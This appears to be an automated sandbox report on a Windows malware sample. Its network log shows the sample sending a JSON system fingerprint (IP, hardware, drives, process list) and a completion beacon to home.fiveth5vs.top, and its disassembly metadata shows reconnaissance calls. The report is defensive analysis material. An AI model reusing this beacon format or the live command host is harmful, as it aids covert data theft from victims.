                                 Dec 31, 2024 09:51:20.470405102 CET | 1.1.1.1 | 192.168.2.10 | 0x2f7c | No error (0) | home.fiveth5vs.top | (none) | 176.53.146.223 | A (IP address) | IN (0x0001) | false
                                • httpbin.org
                                • home.fiveth5vs.top
                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 0 | 192.168.2.10 | 49719 | 176.53.146.223 | 80 | 8044 | C:\Users\user\Desktop\JbN2WYseAr.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Dec 31, 2024 09:51:13.272392035 CET | 12360 | OUT | POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 442563
                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 33 34 31 31 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627434110", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                Dec 31, 2024 09:51:18.070982933 CET  138  IN  HTTP/1.1 200 OK
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 08:51:17 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1
                                Data Raw: 30
                                Data Ascii: 0


                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                1  192.168.2.10  49760  176.53.146.223  80  8044  C:\Users\user\Desktop\JbN2WYseAr.exe
                                Timestamp  Bytes transferred  Direction  Data
                                Dec 31, 2024 09:51:19.301450968 CET  98  OUT  GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Dec 31, 2024 09:51:20.142997980 CET  353  IN  HTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 08:51:19 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                2  192.168.2.10  49766  176.53.146.223  80  8044  C:\Users\user\Desktop\JbN2WYseAr.exe
                                Timestamp  Bytes transferred  Direction  Data
                                Dec 31, 2024 09:51:20.476593018 CET  171  OUT  POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 31, 2024 09:51:21.518542051 CET  353  IN  HTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 08:51:21 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                0  192.168.2.10  49703  34.200.57.114  443  8044  C:\Users\user\Desktop\JbN2WYseAr.exe
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-31 08:51:10 UTC  52  OUT  GET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-31 08:51:10 UTC  224  IN  HTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 08:51:10 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-31 08:51:10 UTC  31  IN  Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}



                                Target ID:0
                                Start time:03:51:07
                                Start date:31/12/2024
                                Path:C:\Users\user\Desktop\JbN2WYseAr.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\JbN2WYseAr.exe"
                                Imagebase:0x420000
                                File size:4'512'256 bytes
                                MD5 hash:3168CDB0691E91FC0109D3D5E854B7B1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:20.8%
                                  Total number of Nodes:245
                                  Total number of Limit Nodes:36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  • API String ID: 0-1590685507
                                  • Opcode ID: 59047042f470541f27575e51102465c8b4c3fce6f730bc4291ddef4dcc177d12
                                  • Instruction ID: be98b88b88469fbc1ec481df376f5b79fbaa0b4fb359319031c2549144385931
                                  • Opcode Fuzzy Hash: 59047042f470541f27575e51102465c8b4c3fce6f730bc4291ddef4dcc177d12
                                  • Instruction Fuzzy Hash: 89C2AF31A043449FD714CF29C484B6BB7E1BF84314F05866EEC989B352E779E989CB86

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00422579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 004225CC
                                  • GetDriveTypeA.KERNELBASE ref: 00422647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0042267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 004227E2
                                  • FindFirstFileW.KERNELBASE ref: 004228F8
                                  • FindNextFileW.KERNELBASE ref: 0042291F
                                  Strings
                                  Memory Dump Source: same dumps as listed above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                  • String ID: ;%B$@$`
                                  • API String ID: 3271271169-2679738426
                                  • Opcode ID: 0c03a5eaee02a1d5ce8a78bfa2df16638f3f29f9c1c0e3ce2a7f4b508d1317cb
                                  • Instruction ID: 3569c8e5879077cbf46e4855bf1dba82cb7f0fc8c169cfa48665cb2526472b52
                                  • Opcode Fuzzy Hash: 0c03a5eaee02a1d5ce8a78bfa2df16638f3f29f9c1c0e3ce2a7f4b508d1317cb
                                  • Instruction Fuzzy Hash: F4D1A0B49083199FCB10EF68D58569EBBF0FF88304F40896AE498D7350E7749A94CF92

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: be248d46e8daeb617e78a19a12e76379bedfec0ccc9a0e82ffc9aa392917f8a8
                                  • Instruction ID: 373cb41c4508292d2b4749a3cea0061569cc5914a2cef1bf75bd93a32f235e2c
                                  • Opcode Fuzzy Hash: be248d46e8daeb617e78a19a12e76379bedfec0ccc9a0e82ffc9aa392917f8a8
                                  • Instruction Fuzzy Hash: 1FE1B5B49083199FDB50EF68DA857AEBBF4AF45304F40896AE488D7350EB789944CF42

                                  Control-flow Graph
                                  (rendered graph not reproduced; basic blocks span 4305b0-430aa4 and call WSAEventSelect and WSAEnumNetworkEvents)
                                  APIs
                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00430711
                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 004309DC
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004309FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: EventSelect$EnumEventsNetwork
                                  • String ID: N=B$multi.c
                                  • API String ID: 2170980988-1850152977
                                  • Opcode ID: 2ae93238eec5ee9bc739ed452359dbcafdf250a0c080837d848b780b4a2b997c
                                  • Instruction ID: 91f2f837a60c9dd6b36f273eef6110eec68a26141dcdcc64d623c68dbcd3e99d
                                  • Opcode Fuzzy Hash: 2ae93238eec5ee9bc739ed452359dbcafdf250a0c080837d848b780b4a2b997c
                                  • Instruction Fuzzy Hash: 39D1F5716083019FE710DF64D891BABB7E5FF98348F04592EF88487241E778E949CB5A

                                  Control-flow Graph
                                  (rendered graph not reproduced; basic blocks span 4eb180-4eb589 and call getsockname)
                                  APIs
                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 004EB2B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                  • API String ID: 3358416759-2430778319
                                  • Opcode ID: 5dd79e2d3cc95a9130d4e1b2db135389a57adb5efd95225aca0f80b6e2b02cab
                                  • Instruction ID: f9ea460ff0e21b2d391d725e072022455568bf023f15b15e062a5e2035f9d2bc
                                  • Opcode Fuzzy Hash: 5dd79e2d3cc95a9130d4e1b2db135389a57adb5efd95225aca0f80b6e2b02cab
                                  • Instruction Fuzzy Hash: AFC18F316043559FD718DF26C885A6B77E1EF88305F04896EE8858B3A2D738ED45CBC5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90200569156a243e462dd8f670625f4552035fd383f312262a90a240fdbc0d95
                                  • Instruction ID: ee41691a7e8630e367b915c40d28fb0642c8a675d79caa44c2ae87bd02e83f5a
                                  • Opcode Fuzzy Hash: 90200569156a243e462dd8f670625f4552035fd383f312262a90a240fdbc0d95
                                  • Instruction Fuzzy Hash: AC9137B160C3094BD7358A28C8D47BB72E5EFC8320F14AB2EE8D9432D4EB799C41D685
                                  APIs
                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,004D712E,?,?,?,00001001,00000000), ref: 004EA90C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: recvfrom
                                  • String ID:
                                  • API String ID: 846543921-0
                                  • Opcode ID: 32dea1ef7e7b892be39a2aabb4ec63e4c527bdfc808608ddd749a9953baeaf00
                                  • Instruction ID: 3596254f4c42d5b010b4949c9c0c88f1e03226689fca30e98e0157bcf3b9e7e8
                                  • Opcode Fuzzy Hash: 32dea1ef7e7b892be39a2aabb4ec63e4c527bdfc808608ddd749a9953baeaf00
                                  • Instruction Fuzzy Hash: B8F01DB5109348AFD2209E42DC88D6BBBEDEFC9754F05496DF958233119271AE11CAB2
                                  APIs
                                  • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 004DA499
                                  • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 004DA4FB
                                  • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 004DA531
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004DAA19
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004DAA4C
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 004DAA97
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004DAAE9
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004DAB30
                                  • RegCloseKey.KERNELBASE(?), ref: 004DAB6A
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 004DAB82
                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 004DAC46
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 004DAD0A
                                  • RegEnumKeyExA.KERNELBASE ref: 004DAD8D
                                  • RegCloseKey.KERNELBASE(?), ref: 004DADD9
                                  • RegEnumKeyExA.KERNELBASE ref: 004DAE08
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 004DAE2A
                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004DAE54
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004DAF63
                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004DAFB2
                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 004DB072
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                  • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                  • API String ID: 4281207131-1047472027
                                  • Opcode ID: 11b62d19418eb9e213b0c4185b7684acd156efc09c940be61ee0d1c11cf9f760
                                  • Instruction ID: 03c51c647e58285b47347af336673449b8e981bb16c7e1dd6107c04b0ca4934c
                                  • Opcode Fuzzy Hash: 11b62d19418eb9e213b0c4185b7684acd156efc09c940be61ee0d1c11cf9f760
                                  • Instruction Fuzzy Hash: 9372DEB1604341AFE3209B25CC95B6B77E8AF85704F14482EF985D7391EB78E814CB97
                                  APIs
                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0045A832
                                  Strings
                                  • cf-socket.c, xrefs: 0045A5CD, 0045A735
                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0045A6CE
                                  • @, xrefs: 0045AC42
                                  • Local Interface %s is ip %s using address family %i, xrefs: 0045AE60
